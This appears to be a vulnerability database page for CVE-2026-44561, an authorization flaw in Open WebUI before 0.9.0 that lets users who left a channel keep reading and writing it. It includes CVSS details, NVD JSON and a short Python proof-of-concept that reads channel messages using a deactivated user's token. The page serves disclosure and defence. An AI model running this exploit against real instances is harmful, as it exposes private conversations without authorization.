CVE-2026-44561

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the is_user_channel_member function checks whether a ChannelMember row exists but does not check the is_active field. When a user is deactivated from a group or DM channel (removed by the channel owner, or leaves voluntarily), their membership row persists with is_active=False and status='left'. Because the authorization check ignores this field, the deactivated user retains full read and write access to the channel via direct API calls. This vulnerability is fixed in 0.9.0.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.9.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
TARGET_URL = "http://target-open-webui-instance/api/v1/channels/{channel_id}/messages"
AUTH_TOKEN = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." # Valid session token of a deactivated user
CHANNEL_ID = "target_channel_id"

headers = {
    "Authorization": f"Bearer {AUTH_TOKEN}",
    "Content-Type": "application/json"
}

# Exploit: Attempt to read messages from a channel the user has left
response = requests.get(TARGET_URL.format(channel_id=CHANNEL_ID), headers=headers)

if response.status_code == 200:
    print("[+] Exploit Successful! Deactivated user can still read channel data.")
    print("[+] Data:", response.json())
else:
    print("[-] Exploit Failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44561
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44561
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44561/
[4] VulDB https://vuldb.com/cve/CVE-2026-44561
[5] https://github.com/open-webui/open-webui/security/advisories/GHSA-hmgr-67hw-j2cq
[6] https://github.com/open-webui/open-webui/security/advisories/GHSA-hmgr-67hw-j2cq

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44561", "sourceIdentifier": "[email protected]", "published": "2026-05-15T20:16:47.743", "lastModified": "2026-05-15T21:16:36.170", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the is_user_channel_member function checks whether a ChannelMember row exists but does not check the is_active field. When a user is deactivated from a group or DM channel (removed by the channel owner, or leaves voluntarily), their membership row persists with is_active=False and status='left'. Because the authorization check ignores this field, the deactivated user retains full read and write access to the channel via direct API calls. This vulnerability is fixed in 0.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-hmgr-67hw-j2cq", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-hmgr-67hw-j2cq", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}